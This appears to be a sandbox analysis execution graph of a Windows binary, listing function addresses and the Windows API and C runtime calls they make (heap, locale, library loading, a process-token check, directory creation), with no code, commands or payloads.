                                                                                                        Signature Coverage:3.2%
                                                                                                        Total number of Nodes:721
                                                                                                        Total number of Limit Nodes:19
                                                                                                        execution_graph 11499 c9abc0 11500 c9ac04 11499->11500 11501 c9abcc 11499->11501 11501->11500 11502 c9a9b0 2 API calls 11501->11502 11502->11500 11503 da08f0 11504 da0927 11503->11504 11508 da0967 11503->11508 11505 e70260 6 API calls 11504->11505 11506 da0931 11505->11506 11507 e70216 __Init_thread_footer 5 API calls 11506->11507 11506->11508 11507->11508 11509 cc2080 11510 e6fd94 std::_Facet_Register 4 API calls 11509->11510 11511 cc20c4 11510->11511 11514 caf0f0 11511->11514 11513 cc210f 11515 caf10d 11514->11515 11524 caf187 std::ios_base::_Ios_base_dtor 11514->11524 11516 caf1cd 11515->11516 11518 caf14b 11515->11518 11519 caf124 11515->11519 11517 c98830 15 API calls 11516->11517 11525 caf1d2 11517->11525 11520 e6fd94 std::_Facet_Register 4 API calls 11518->11520 11522 caf135 11518->11522 11519->11516 11521 e6fd94 std::_Facet_Register 4 API calls 11519->11521 11520->11522 11521->11522 11523 e751ef 11 API calls 11522->11523 11522->11524 11523->11516 11524->11513 11526 e6fd94 std::_Facet_Register 4 API calls 11525->11526 11527 caf24f 11525->11527 11528 caf29b 11526->11528 11527->11513 11529 c97830 15 API calls 11528->11529 11530 caf2b3 11529->11530 11532 caf31d 11530->11532 11533 ca3370 11530->11533 11532->11513 11536 e96370 11533->11536 11535 ca3392 11535->11532 11537 e9637d 11536->11537 11539 e96ad0 __floor_pentium4 11536->11539 11538 e963ae 11537->11538 11537->11539 11542 e963f8 11538->11542 11544 e95d0c 11538->11544 11543 e96b12 __floor_pentium4 11539->11543 11547 e8aaf8 11539->11547 11542->11535 11543->11535 11545 e95d1f DecodePointer 11544->11545 11546 e95d2f __cftof 11544->11546 11545->11546 11546->11542 11548 e8ab31 __floor_pentium4 11547->11548 11549 e6fd55 __floor_pentium4 5 API calls 11548->11549 11550 e8abbf 11549->11550 11550->11543 12063 c97692 12064 c9769b 12063->12064 12067 db4b80 12064->12067 12066 c976aa 12068 e6fd94 std::_Facet_Register 4 API calls 12067->12068 12069 db4b94 12068->12069 12072 e6db49 12069->12072 12071 db4b9d 12071->12066 12073 e6db55 __EH_prolog3 12072->12073 12084 e6dd88 12073->12084 12078 e6db73 12096 e6dcce 12078->12096 12079 e6dbce std::locale::_Setgloballocale 12079->12071 12083 e6db91 12106 e6dde0 12083->12106 12085 e6dd97 12084->12085 12086 e6dd9e 12084->12086 12113 e83882 12085->12113 12088 e6db60 12086->12088 12117 e6f43d EnterCriticalSection 12086->12117 12088->12083 12090 e6dcab 12088->12090 12091 e6fd94 std::_Facet_Register 4 API calls 12090->12091 12092 e6dcb6 12091->12092 12093 e6dcca 12092->12093 12119 e6da31 12092->12119 12093->12078 12097 e6db7b 12096->12097 12098 e6dcda 12096->12098 12100 dafd50 12097->12100 12122 e6f3eb 12098->12122 12101 dafdaf std::locale::_Locimp::_Locimp 12100->12101 12102 dafd80 12100->12102 12101->12083 12103 e79c89 ___std_exception_destroy 2 API calls 12102->12103 12104 dafd8a 12102->12104 12103->12104 12104->12101 12104->12104 12105 e79c7e ___std_exception_copy 3 API calls 12104->12105 12105->12101 12107 e83890 12106->12107 12108 e6ddea 12106->12108 12136 e8386b LeaveCriticalSection 12107->12136 12110 e6ddfd 12108->12110 12135 e6f44b LeaveCriticalSection 12108->12135 12110->12079 12111 e83897 12111->12079 12114 e83887 12113->12114 12118 e83823 EnterCriticalSection 12114->12118 12116 e8388e 12116->12088 12117->12088 12118->12116 12120 dafd50 std::locale::_Locimp::_Locimp 5 API calls 12119->12120 12121 e6da6b 12120->12121 12121->12078 12123 e7987b 12122->12123 12124 e6f3fb EncodePointer 12122->12124 12125 e8947f std::locale::_Setgloballocale 2 API calls 12123->12125 12124->12097 12124->12123 12126 e79880 12125->12126 12127 e7988b 12126->12127 12128 e894c4 std::locale::_Setgloballocale 35 API calls 12126->12128 12129 e79895 IsProcessorFeaturePresent 12127->12129 12134 e798b4 12127->12134 12128->12127 12130 e798a1 12129->12130 12132 e74fe3 std::locale::_Setgloballocale 8 API calls 12130->12132 12131 e7b61b std::locale::_Setgloballocale 18 API calls 12133 e798be 12131->12133 12132->12134 12134->12131 12135->12110 12136->12111 12215 e8aa69 12216 e8aa76 12215->12216 12219 e89ec9 12216->12219 12227 e8991f 12219->12227 12222 e89eda LCMapStringEx 12226 e89f21 12222->12226 12223 e89f01 12224 e89f1a LCMapStringW 12223->12224 12224->12226 12228 e89a1e std::locale::_Setgloballocale 5 API calls 12227->12228 12229 e89935 12228->12229 12229->12222 12229->12223 12455 e85c7e 12456 e85c8a std::locale::_Setgloballocale 12455->12456 12463 e83823 EnterCriticalSection 12456->12463 12458 e85c98 12464 e85cd9 12458->12464 12460 e85ca5 12474 e85ccd 12460->12474 12463->12458 12465 e85d67 std::locale::_Setgloballocale 12464->12465 12466 e85cf4 12464->12466 12465->12460 12466->12465 12473 e85d47 12466->12473 12477 e79caf 12466->12477 12468 e79caf 18 API calls 12470 e85d5d 12468->12470 12469 e85d3d 12471 e8817e ___free_lconv_mon 2 API calls 12469->12471 12472 e8817e ___free_lconv_mon 2 API calls 12470->12472 12471->12473 12472->12465 12473->12465 12473->12468 12503 e8386b LeaveCriticalSection 12474->12503 12476 e85cb6 12478 e79cbc 12477->12478 12479 e79ce6 12478->12479 12482 e79cc8 __cftof std::locale::_Setgloballocale 12478->12482 12483 e8a0c1 12478->12483 12488 e8a0f4 12479->12488 12482->12469 12484 e8a0cc __cftof 12483->12484 12485 e8a0e1 HeapSize 12483->12485 12486 e751df __cftof 11 API calls 12484->12486 12485->12479 12487 e8a0dc 12486->12487 12487->12479 12489 e8a10c 12488->12489 12490 e8a101 12488->12490 12492 e8a114 12489->12492 12496 e8a11d std::locale::_Setgloballocale 12489->12496 12498 e881b8 12490->12498 12493 e8817e ___free_lconv_mon 2 API calls 12492->12493 12495 e8a109 __cftof 12493->12495 12494 e8a147 HeapReAlloc 12494->12495 12494->12496 12495->12482 12496->12494 12496->12495 12497 e85443 std::_Facet_Register 2 API calls 12496->12497 12497->12496 12500 e881f4 __cftof 12498->12500 12501 e881c6 std::locale::_Setgloballocale 12498->12501 12499 e881e1 RtlAllocateHeap 12499->12500 12499->12501 12500->12495 12501->12499 12501->12500 12502 e85443 std::_Facet_Register 2 API calls 12501->12502 12502->12501 12503->12476 11484 c98850 11485 c98896 11484->11485 11486 c9885b 11484->11486 11487 c98830 15 API calls 11485->11487 11488 c98864 11486->11488 11489 c98886 11486->11489 11496 c98871 11487->11496 11488->11485 11490 c9886b 11488->11490 11489->11485 11491 c9888a 11489->11491 11492 e6fd94 std::_Facet_Register 4 API calls 11490->11492 11494 e6fd94 std::_Facet_Register 4 API calls 11491->11494 11492->11496 11493 e751ef 11 API calls 11497 c988a5 11493->11497 11495 c98890 11494->11495 11496->11493 11498 c9887a 11496->11498 10825 ca180e 10862 e70260 EnterCriticalSection 10825->10862 10827 ca1818 10828 ca1846 10827->10828 10883 e70216 EnterCriticalSection LeaveCriticalSection 10827->10883 10829 ca1a87 10828->10829 10867 db72e0 10828->10867 10961 c97830 10829->10961 10833 ca1a93 10970 e6fd55 10833->10970 10836 ca1abd 10837 ca18ba 10839 ca18d5 GetWindowsDirectoryW 10837->10839 10842 ca18c3 PathFileExistsW 10837->10842 10838 e70260 6 API calls 10841 ca187a 10838->10841 10888 e79c73 10839->10888 10841->10837 10843 ca1886 GetModuleHandleW GetProcAddress 10841->10843 10846 ca1917 10842->10846 10848 ca19a9 10842->10848 10845 e70216 __Init_thread_footer 5 API calls 10843->10845 10847 ca18b7 10845->10847 10892 db76d0 10846->10892 10847->10837 10848->10829 10940 c98300 10848->10940 10851 ca1940 10853 db76d0 13 API calls 10851->10853 10852 ca1a12 10948 dad440 10852->10948 10855 ca1957 10853->10855 10914 db7c40 10855->10914 10858 ca199a 10921 db7580 10858->10921 10859 ca1966 CreateDirectoryW 10859->10858 10861 ca1a2a std::ios_base::_Ios_base_dtor 10861->10829 10864 e70274 10862->10864 10865 e70279 LeaveCriticalSection 10864->10865 10977 e702e8 10864->10977 10865->10827 10868 db7328 GetCurrentProcess OpenProcessToken 10867->10868 10869 db733f GetLastError 10868->10869 10870 db734c GetTokenInformation 10868->10870 10871 db73f4 10869->10871 10872 db739b 10870->10872 10873 db736f GetLastError 10870->10873 10874 db741f FindCloseChangeNotification 10871->10874 10875 db742d 10871->10875 10876 db73ee GetLastError 10872->10876 10877 db73a1 AllocateAndInitializeSid 10872->10877 10873->10876 10880 db737a 10873->10880 10874->10875 10879 e6fd55 __floor_pentium4 5 API calls 10875->10879 10876->10871 10877->10871 10878 db73d2 EqualSid FreeSid 10877->10878 10878->10871 10881 ca185b 10879->10881 10882 db7385 GetTokenInformation 10880->10882 10881->10837 10881->10838 10882->10872 10882->10876 10884 e702b2 10883->10884 10885 e702ce SetEvent ResetEvent 10884->10885 10886 e702bd RtlWakeAllConditionVariable 10884->10886 10885->10828 10886->10828 10889 e79bfb __cftof 10888->10889 10891 e79c2b 10889->10891 10982 e751df 10889->10982 10891->10842 10893 db775c LoadLibraryW 10892->10893 10898 db795a 10892->10898 10894 db779f GetProcAddress 10893->10894 10895 db7781 GetLastError 10893->10895 10896 db77db FreeLibrary 10894->10896 10897 db77af FreeLibrary GetLastError 10894->10897 10910 db7811 10895->10910 10900 db7808 GetLastError 10896->10900 10902 db7818 10896->10902 10897->10910 10901 db79b9 GetLastError 10898->10901 10904 db7928 10898->10904 10900->10910 10901->10904 10905 db79c8 10901->10905 10903 db7886 GetLastError 10902->10903 10902->10904 10903->10910 10912 db7891 10903->10912 10908 db7b0a 10904->10908 10904->10910 11006 c9a9b0 10904->11006 10905->10904 10907 db7a1e GetLastError 10905->10907 10907->10904 10909 c9a9b0 2 API calls 10908->10909 10908->10910 10911 db7c1a 10909->10911 10910->10851 10912->10904 10913 db78ea GetLastError 10912->10913 10913->10910 10915 db7c58 LocalFree 10914->10915 10916 db7c61 10914->10916 10915->10916 10917 db7c68 LocalFree 10916->10917 10918 db7c72 10916->10918 10917->10918 10919 ca1962 10918->10919 10920 db7ca7 GetLastError 10918->10920 10919->10858 10919->10859 10920->10919 10922 db75f8 10921->10922 10936 db75bb 10921->10936 10923 db7604 10922->10923 11013 e79c89 10922->11013 10926 db7628 10923->10926 10930 e79c89 ___std_exception_destroy 2 API calls 10923->10930 10924 db76bf 10929 c9a9b0 2 API calls 10924->10929 10927 db764d LocalFree 10926->10927 10928 db7650 10926->10928 10927->10928 10932 db765a 10928->10932 10933 db7657 LocalFree 10928->10933 10931 db76c9 10929->10931 10930->10926 10935 db766b 10932->10935 10937 e79c89 ___std_exception_destroy 2 API calls 10932->10937 10933->10932 10934 db75e3 LocalFree 10934->10936 10938 db7696 10935->10938 10939 e79c89 ___std_exception_destroy 2 API calls 10935->10939 10936->10922 10936->10924 10936->10934 10937->10935 10938->10848 10939->10938 10942 c98310 10940->10942 10943 c9838e 10940->10943 10941 c9831d std::locale::_Locimp::_Locimp 10941->10852 10942->10941 11020 c98850 10942->11020 10945 c98300 15 API calls 10943->10945 10947 c983ef 10945->10947 10946 c98365 std::locale::_Locimp::_Locimp 10946->10852 10947->10852 10949 c97830 15 API calls 10948->10949 10950 dad487 10949->10950 11084 dad510 10950->11084 10952 dad49c 11116 dadd80 10952->11116 10954 dad4b5 10955 dad4d6 10954->10955 11123 c9d630 10954->11123 11131 c98960 10955->11131 10958 dad4e5 10959 e6fd55 __floor_pentium4 5 API calls 10958->10959 10960 dad4fc 10959->10960 10960->10861 10962 c97856 10961->10962 10963 c978ca 10962->10963 10964 c97861 10962->10964 10966 c978ee 10963->10966 10969 c98960 11 API calls 10963->10969 10965 c9786d 10964->10965 10967 c98850 15 API calls 10964->10967 10965->10833 10966->10833 10968 c978a7 std::locale::_Locimp::_Locimp 10967->10968 10968->10833 10969->10963 10971 e6fd5e IsProcessorFeaturePresent 10970->10971 10972 e6fd5d 10970->10972 10974 e70461 10971->10974 10972->10836 11483 e70424 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10974->11483 10976 e70544 10976->10836 10978 e702f6 SleepConditionVariableCS 10977->10978 10979 e7030f LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 10977->10979 10980 e70333 10978->10980 10979->10980 10980->10864 10985 e7512b 10982->10985 10984 e751eb 10984->10891 10986 e7513d __cftof 10985->10986 10989 e75162 10986->10989 10988 e75155 10988->10984 10990 e75172 10989->10990 10992 e75187 10990->10992 10996 e7520c IsProcessorFeaturePresent 10990->10996 10992->10988 10993 e751de 10994 e7512b __cftof 11 API calls 10993->10994 10995 e751eb 10994->10995 10995->10988 10997 e75218 10996->10997 11000 e74fe3 10997->11000 11001 e74fff std::locale::_Setgloballocale 11000->11001 11002 e7502b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11001->11002 11003 e750fc std::locale::_Setgloballocale 11002->11003 11004 e6fd55 __floor_pentium4 5 API calls 11003->11004 11005 e7511a GetCurrentProcess TerminateProcess 11004->11005 11005->10993 11007 c9a9bd 11006->11007 11010 e71aea 11007->11010 11009 c9a9ca RtlAllocateHeap 11009->10908 11011 e71b04 11010->11011 11012 e71b31 RaiseException 11010->11012 11011->11012 11012->11009 11016 e8817e 11013->11016 11015 e79ca1 11015->10923 11017 e88189 HeapFree 11016->11017 11019 e881ab __cftof ___free_lconv_mon 11016->11019 11018 e8819e GetLastError 11017->11018 11017->11019 11018->11019 11019->11015 11021 c98896 11020->11021 11022 c9885b 11020->11022 11021->10946 11043 c98830 11021->11043 11024 c98864 11022->11024 11025 c98886 11022->11025 11024->11021 11026 c9886b 11024->11026 11025->11021 11027 c9888a 11025->11027 11035 e6fd94 11026->11035 11030 e6fd94 std::_Facet_Register 4 API calls 11027->11030 11031 c98890 11030->11031 11031->10946 11032 c98871 11034 c9887a 11032->11034 11060 e751ef 11032->11060 11034->10946 11037 e6fd99 11035->11037 11038 e6fdb3 11037->11038 11040 e6fdb5 std::_Facet_Register 11037->11040 11065 e85443 11037->11065 11068 e79c7e 11037->11068 11038->11032 11041 e71aea std::_Facet_Register RaiseException 11040->11041 11042 e70c00 11041->11042 11044 c9883b std::_Facet_Register 11043->11044 11045 e71aea std::_Facet_Register RaiseException 11044->11045 11047 c9884a 11045->11047 11046 c98896 11046->11032 11048 c98830 15 API calls 11046->11048 11047->11046 11049 c98864 11047->11049 11050 c98886 11047->11050 11052 c98871 11048->11052 11049->11046 11051 c9886b 11049->11051 11050->11046 11053 c9888a 11050->11053 11054 e6fd94 std::_Facet_Register 4 API calls 11051->11054 11055 e751ef 11 API calls 11052->11055 11059 c9887a 11052->11059 11056 e6fd94 std::_Facet_Register 4 API calls 11053->11056 11054->11052 11058 c988a5 11055->11058 11057 c98890 11056->11057 11057->11032 11059->11032 11061 e7512b __cftof 11 API calls 11060->11061 11062 e751fe 11061->11062 11063 e7520c __cftof 11 API calls 11062->11063 11064 e7520b 11063->11064 11073 e85470 11065->11073 11072 e881b8 std::locale::_Setgloballocale 11068->11072 11069 e881f4 __cftof 11069->11037 11070 e881e1 RtlAllocateHeap 11070->11069 11070->11072 11071 e85443 std::_Facet_Register 2 API calls 11071->11072 11072->11069 11072->11070 11072->11071 11074 e8547c std::locale::_Setgloballocale 11073->11074 11079 e83823 EnterCriticalSection 11074->11079 11076 e85487 11080 e854c3 11076->11080 11079->11076 11083 e8386b LeaveCriticalSection 11080->11083 11082 e8544e 11082->11037 11083->11082 11135 daf140 11084->11135 11086 dad58b 11087 dad68e 11086->11087 11088 dad596 11086->11088 11091 daf140 46 API calls 11087->11091 11089 dad7d2 11088->11089 11090 dad5b3 11088->11090 11144 c98230 11089->11144 11093 c98300 15 API calls 11090->11093 11094 dad6b7 11091->11094 11096 dad5d7 11093->11096 11100 dad7dc 11094->11100 11101 dad6e7 11094->11101 11115 dad678 std::ios_base::_Ios_base_dtor 11094->11115 11095 dad7d7 11098 e751ef 11 API calls 11095->11098 11140 cc2880 11096->11140 11097 e6fd55 __floor_pentium4 5 API calls 11102 dad7cb 11097->11102 11098->11100 11103 c98230 15 API calls 11100->11103 11105 c98300 15 API calls 11101->11105 11102->10952 11106 dad7e1 11103->11106 11108 dad70b 11105->11108 11152 dad870 11106->11152 11107 dad606 11109 c98960 11 API calls 11107->11109 11112 c98960 11 API calls 11108->11112 11113 dad636 11109->11113 11111 c98960 11 API calls 11111->11107 11112->11115 11113->11095 11113->11115 11115->11097 11121 daddfc std::locale::_Locimp::_Locimp 11116->11121 11117 dae02a std::ios_base::_Ios_base_dtor 11117->10954 11118 e751ef 11 API calls 11119 dae078 11118->11119 11120 c98230 15 API calls 11119->11120 11122 dae07d 11120->11122 11121->11117 11121->11118 11121->11119 11122->10954 11125 c9d641 std::locale::_Locimp::_Locimp 11123->11125 11126 c9d67d 11123->11126 11124 c9d731 11125->10955 11126->11124 11127 c98850 15 API calls 11126->11127 11128 c9d6c6 std::locale::_Locimp::_Locimp 11127->11128 11129 c9d715 std::ios_base::_Ios_base_dtor 11128->11129 11130 e751ef 11 API calls 11128->11130 11129->10955 11130->11124 11132 c989ae std::ios_base::_Ios_base_dtor 11131->11132 11134 c9898d 11131->11134 11132->10958 11133 e751ef 11 API calls 11133->11134 11134->11131 11134->11132 11134->11133 11136 daf14d 11135->11136 11137 daf160 std::locale::_Setgloballocale 11135->11137 11136->11137 11168 e7b971 11136->11168 11137->11086 11139 daf176 11139->11086 11141 cc28c0 11140->11141 11141->11141 11416 c99c20 11141->11416 11143 cc28dc 11143->11107 11143->11111 11145 c9823a 11144->11145 11146 c982ce 11145->11146 11147 c98290 11145->11147 11148 c98230 15 API calls 11146->11148 11150 c98300 15 API calls 11147->11150 11149 c982d3 11148->11149 11149->11095 11151 c982ab 11150->11151 11151->11095 11153 dad8ac 11152->11153 11156 dad8be 11152->11156 11154 c98960 11 API calls 11153->11154 11153->11156 11154->11153 11157 dad92e 11156->11157 11162 c97830 15 API calls 11156->11162 11167 c98960 11 API calls 11156->11167 11421 dae100 11156->11421 11440 dae610 11156->11440 11445 c99110 11156->11445 11158 c98960 11 API calls 11157->11158 11159 dad93a 11158->11159 11161 c98960 11 API calls 11159->11161 11163 dad949 11161->11163 11162->11156 11164 e6fd55 __floor_pentium4 5 API calls 11163->11164 11166 dad84d 11164->11166 11166->10952 11167->11156 11169 e7b9a2 11168->11169 11171 e7b97f 11168->11171 11176 e7b9bd 11169->11176 11170 e7b985 __cftof 11174 e751df __cftof 11 API calls 11170->11174 11171->11169 11171->11170 11173 e7b9b8 11173->11139 11175 e7b995 11174->11175 11175->11139 11177 e7b9e7 11176->11177 11178 e7b9cd __cftof 11176->11178 11179 e7b9ef __cftof 11177->11179 11180 e7ba09 11177->11180 11182 e751df __cftof 11 API calls 11178->11182 11183 e751df __cftof 11 API calls 11179->11183 11184 e7b9dd 11180->11184 11185 e798bf 11180->11185 11182->11184 11183->11184 11184->11173 11186 e798dd 11185->11186 11190 e87dd6 GetLastError 11186->11190 11188 e798fe 11217 e88120 11188->11217 11191 e87dec 11190->11191 11192 e87df2 11190->11192 11221 e89c6f 11191->11221 11196 e87df6 SetLastError 11192->11196 11226 e89cae 11192->11226 11200 e87e8b 11196->11200 11201 e87e86 11196->11201 11199 e87e23 11202 e87e2b 11199->11202 11203 e87e3c 11199->11203 11241 e7987b 11200->11241 11201->11188 11205 e89cae std::locale::_Setgloballocale 6 API calls 11202->11205 11206 e89cae std::locale::_Setgloballocale 6 API calls 11203->11206 11208 e87e39 11205->11208 11209 e87e48 11206->11209 11214 e8817e ___free_lconv_mon 2 API calls 11208->11214 11210 e87e4c 11209->11210 11211 e87e63 11209->11211 11213 e89cae std::locale::_Setgloballocale 6 API calls 11210->11213 11236 e87c04 11211->11236 11213->11208 11214->11196 11216 e8817e ___free_lconv_mon 2 API calls 11216->11196 11218 e88148 11217->11218 11219 e88133 11217->11219 11219->11218 11346 e8fef7 11219->11346 11252 e89a1e 11221->11252 11224 e89c94 11224->11192 11225 e89ca6 TlsGetValue 11227 e89a1e std::locale::_Setgloballocale 5 API calls 11226->11227 11228 e89cca 11227->11228 11229 e89ce8 TlsSetValue 11228->11229 11230 e87e0e 11228->11230 11230->11196 11231 e89720 11230->11231 11234 e8972d std::locale::_Setgloballocale 11231->11234 11232 e89758 RtlAllocateHeap 11233 e8976b __cftof 11232->11233 11232->11234 11233->11199 11234->11232 11234->11233 11235 e85443 std::_Facet_Register 2 API calls 11234->11235 11235->11234 11267 e87a98 11236->11267 11293 e8947f 11241->11293 11244 e7988b 11246 e79895 IsProcessorFeaturePresent 11244->11246 11251 e798b4 11244->11251 11247 e798a1 11246->11247 11249 e74fe3 std::locale::_Setgloballocale 8 API calls 11247->11249 11249->11251 11319 e7b61b 11251->11319 11253 e89a4c 11252->11253 11256 e89a48 11252->11256 11253->11256 11259 e89953 11253->11259 11256->11224 11256->11225 11257 e89a66 GetProcAddress 11257->11256 11258 e89a76 std::locale::_Setgloballocale 11257->11258 11258->11256 11265 e89964 std::locale::_Setgloballocale 11259->11265 11260 e899fa 11260->11256 11260->11257 11261 e89982 LoadLibraryExW 11262 e8999d GetLastError 11261->11262 11263 e89a01 11261->11263 11262->11265 11263->11260 11264 e89a13 FreeLibrary 11263->11264 11264->11260 11265->11260 11265->11261 11266 e899d0 LoadLibraryExW 11265->11266 11266->11263 11266->11265 11268 e87aa4 std::locale::_Setgloballocale 11267->11268 11281 e83823 EnterCriticalSection 11268->11281 11270 e87aae 11282 e87ade 11270->11282 11273 e87baa 11274 e87bb6 std::locale::_Setgloballocale 11273->11274 11285 e83823 EnterCriticalSection 11274->11285 11276 e87bc0 11286 e87d8b 11276->11286 11278 e87bd8 11290 e87bf8 11278->11290 11281->11270 11283 e8386b std::_Lockit::~_Lockit LeaveCriticalSection 11282->11283 11284 e87acc 11283->11284 11284->11273 11285->11276 11287 e87d9a 11286->11287 11289 e87dc1 std::locale::_Setgloballocale 11286->11289 11288 e91566 std::locale::_Setgloballocale HeapFree GetLastError 11287->11288 11287->11289 11288->11289 11289->11278 11291 e8386b std::_Lockit::~_Lockit LeaveCriticalSection 11290->11291 11292 e87be6 11291->11292 11292->11216 11322 e893b1 11293->11322 11296 e894c4 11297 e894d0 std::locale::_Setgloballocale 11296->11297 11298 e89544 __cftof 11297->11298 11300 e894fd std::locale::_Setgloballocale 11297->11300 11318 e8952e 11297->11318 11299 e751df __cftof 11 API calls 11298->11299 11299->11318 11301 e89570 11300->11301 11328 e83823 EnterCriticalSection 11300->11328 11304 e895b2 11301->11304 11305 e896a3 11301->11305 11315 e895e1 11301->11315 11310 e87dd6 std::locale::_Setgloballocale 35 API calls 11304->11310 11304->11315 11306 e896ae 11305->11306 11333 e8386b LeaveCriticalSection 11305->11333 11309 e7b61b std::locale::_Setgloballocale 18 API calls 11306->11309 11311 e896b6 11309->11311 11312 e895d6 11310->11312 11314 e87dd6 std::locale::_Setgloballocale 35 API calls 11312->11314 11313 e87dd6 std::locale::_Setgloballocale 35 API calls 11316 e89636 11313->11316 11314->11315 11329 e89650 11315->11329 11317 e87dd6 std::locale::_Setgloballocale 35 API calls 11316->11317 11316->11318 11317->11318 11318->11244 11334 e7b43f 11319->11334 11323 e893bd std::locale::_Setgloballocale 11322->11323 11324 e83823 std::_Lockit::_Lockit EnterCriticalSection 11323->11324 11325 e893cb 11324->11325 11326 e89409 std::locale::_Setgloballocale LeaveCriticalSection 11325->11326 11327 e79880 11326->11327 11327->11244 11327->11296 11328->11301 11330 e89627 11329->11330 11331 e89656 11329->11331 11330->11313 11330->11316 11330->11318 11332 e8386b std::_Lockit::~_Lockit LeaveCriticalSection 11331->11332 11332->11330 11333->11306 11335 e7b47e 11334->11335 11336 e7b46c 11334->11336 11337 e7b2e8 std::locale::_Setgloballocale EnterCriticalSection LeaveCriticalSection HeapFree GetLastError 11335->11337 11338 e7b507 std::locale::_Setgloballocale GetModuleHandleW 11336->11338 11341 e7b4b5 11337->11341 11339 e7b471 11338->11339 11339->11335 11342 e7b56c std::locale::_Setgloballocale GetModuleHandleExW GetProcAddress FreeLibrary 11339->11342 11340 e798be 11341->11340 11343 e7b4d6 std::locale::_Setgloballocale 13 API calls 11341->11343 11344 e7b47d 11342->11344 11345 e7b4d0 11343->11345 11344->11335 11347 e87dd6 std::locale::_Setgloballocale 35 API calls 11346->11347 11348 e8fefc 11347->11348 11351 e8fe0f 11348->11351 11350 e8ff07 11350->11218 11352 e8fe1b std::locale::_Setgloballocale 11351->11352 11353 e8fe35 11352->11353 11366 e83823 EnterCriticalSection 11352->11366 11355 e8fe3c 11353->11355 11358 e7987b std::locale::_Setgloballocale 35 API calls 11353->11358 11355->11350 11356 e8fe71 11367 e8fe8e 11356->11367 11359 e8feae 11358->11359 11361 e8feea 11359->11361 11370 e87e91 11359->11370 11360 e8fe45 11360->11356 11363 e8817e ___free_lconv_mon 2 API calls 11360->11363 11361->11350 11363->11356 11366->11360 11368 e8386b std::_Lockit::~_Lockit LeaveCriticalSection 11367->11368 11369 e8fe95 11368->11369 11369->11353 11371 e87e9c 11370->11371 11372 e87ea2 11370->11372 11373 e89c6f std::locale::_Setgloballocale 6 API calls 11371->11373 11374 e89cae std::locale::_Setgloballocale 6 API calls 11372->11374 11376 e87ea8 11372->11376 11373->11372 11375 e87ebc 11374->11375 11375->11376 11377 e89720 std::locale::_Setgloballocale EnterCriticalSection LeaveCriticalSection RtlAllocateHeap 11375->11377 11378 e7987b std::locale::_Setgloballocale 35 API calls 11376->11378 11394 e87ead 11376->11394 11379 e87ecc 11377->11379 11380 e87f26 11378->11380 11381 e87ee9 11379->11381 11382 e87ed4 11379->11382 11384 e89cae std::locale::_Setgloballocale 6 API calls 11381->11384 11383 e89cae std::locale::_Setgloballocale 6 API calls 11382->11383 11385 e87ee0 11383->11385 11386 e87ef5 11384->11386 11390 e8817e ___free_lconv_mon HeapFree GetLastError 11385->11390 11387 e87f08 11386->11387 11388 e87ef9 11386->11388 11389 e87c04 std::locale::_Setgloballocale EnterCriticalSection LeaveCriticalSection HeapFree GetLastError 11387->11389 11391 e89cae std::locale::_Setgloballocale 6 API calls 11388->11391 11392 e87f13 11389->11392 11390->11376 11391->11385 11393 e8817e ___free_lconv_mon HeapFree GetLastError 11392->11393 11393->11394 11395 e8fcba 11394->11395 11396 e8fe0f 46 API calls 11395->11396 11397 e8fce4 11396->11397 11398 e8fa3a 46 API calls 11397->11398 11399 e8fcec 11398->11399 11400 e881b8 EnterCriticalSection LeaveCriticalSection RtlAllocateHeap 11399->11400 11406 e8fcfd 11399->11406 11401 e8fd0e 11400->11401 11402 e8fd24 11401->11402 11403 e8fd16 11401->11403 11405 e8ff0a 46 API calls 11402->11405 11404 e8817e ___free_lconv_mon HeapFree GetLastError 11403->11404 11404->11406 11407 e8fd51 11405->11407 11406->11361 11408 e8fd5c __cftof 11407->11408 11410 e8fd77 11407->11410 11412 e8817e ___free_lconv_mon HeapFree GetLastError 11408->11412 11409 e8fda3 11411 e8fdec 11409->11411 11414 e8f92c 15 API calls 11409->11414 11410->11409 11413 e8817e ___free_lconv_mon HeapFree GetLastError 11410->11413 11415 e8817e ___free_lconv_mon HeapFree GetLastError 11411->11415 11412->11406 11413->11409 11414->11411 11415->11406 11417 c99d04 11416->11417 11420 c99c33 std::locale::_Locimp::_Locimp 11416->11420 11418 c98230 15 API calls 11417->11418 11419 c99d09 11418->11419 11420->11143 11423 dae149 11421->11423 11422 dae26e 11424 c9d630 15 API calls 11422->11424 11439 dae26c 11422->11439 11423->11422 11425 dae1b2 11423->11425 11424->11439 11454 c98240 11425->11454 11426 e6fd55 __floor_pentium4 5 API calls 11428 dae2d1 11426->11428 11428->11156 11429 dae1c3 11430 dae1dd 11429->11430 11432 c98960 11 API calls 11429->11432 11431 c98960 11 API calls 11430->11431 11433 dae215 11431->11433 11432->11430 11434 c98240 15 API calls 11433->11434 11435 dae223 11434->11435 11436 dae23a 11435->11436 11437 c98960 11 API calls 11435->11437 11438 c98960 11 API calls 11436->11438 11437->11436 11438->11439 11439->11426 11441 dae661 11440->11441 11444 dae61a 11440->11444 11441->11156 11442 c98960 11 API calls 11442->11444 11443 dae65a 11443->11156 11444->11442 11444->11443 11446 c9917c 11445->11446 11447 c99270 11445->11447 11461 c97de0 11446->11461 11449 c991bc 11450 c97830 15 API calls 11449->11450 11451 c991ea 11450->11451 11476 c99370 11451->11476 11453 c99236 11453->11156 11455 c982ce 11454->11455 11456 c98290 11454->11456 11457 c98230 15 API calls 11455->11457 11459 c98300 15 API calls 11456->11459 11458 c982d3 11457->11458 11458->11429 11460 c982ab 11459->11460 11460->11429 11462 c97deb 11461->11462 11463 c97e2f 11461->11463 11465 c97df8 11462->11465 11467 c97e1a 11462->11467 11464 c98830 15 API calls 11463->11464 11468 c97e05 11464->11468 11465->11463 11469 c97dff 11465->11469 11466 c97e2a 11466->11449 11467->11466 11470 e6fd94 std::_Facet_Register 4 API calls 11467->11470 11471 e751ef 11 API calls 11468->11471 11475 c97e0e 11468->11475 11472 e6fd94 std::_Facet_Register 4 API calls 11469->11472 11473 c97e24 11470->11473 11474 c97e39 11471->11474 11472->11468 11473->11449 11475->11449 11477 c993c7 std::ios_base::_Ios_base_dtor 11476->11477 11479 c9937a 11476->11479 11477->11453 11478 c99390 11478->11477 11481 e751ef 11 API calls 11478->11481 11479->11478 11480 c98960 11 API calls 11479->11480 11480->11479 11482 c993fd 11481->11482 11483->10976 13857 e91812 13860 e8386b LeaveCriticalSection 13857->13860 13859 e91819 13860->13859

                                                                                                        Executed Functions

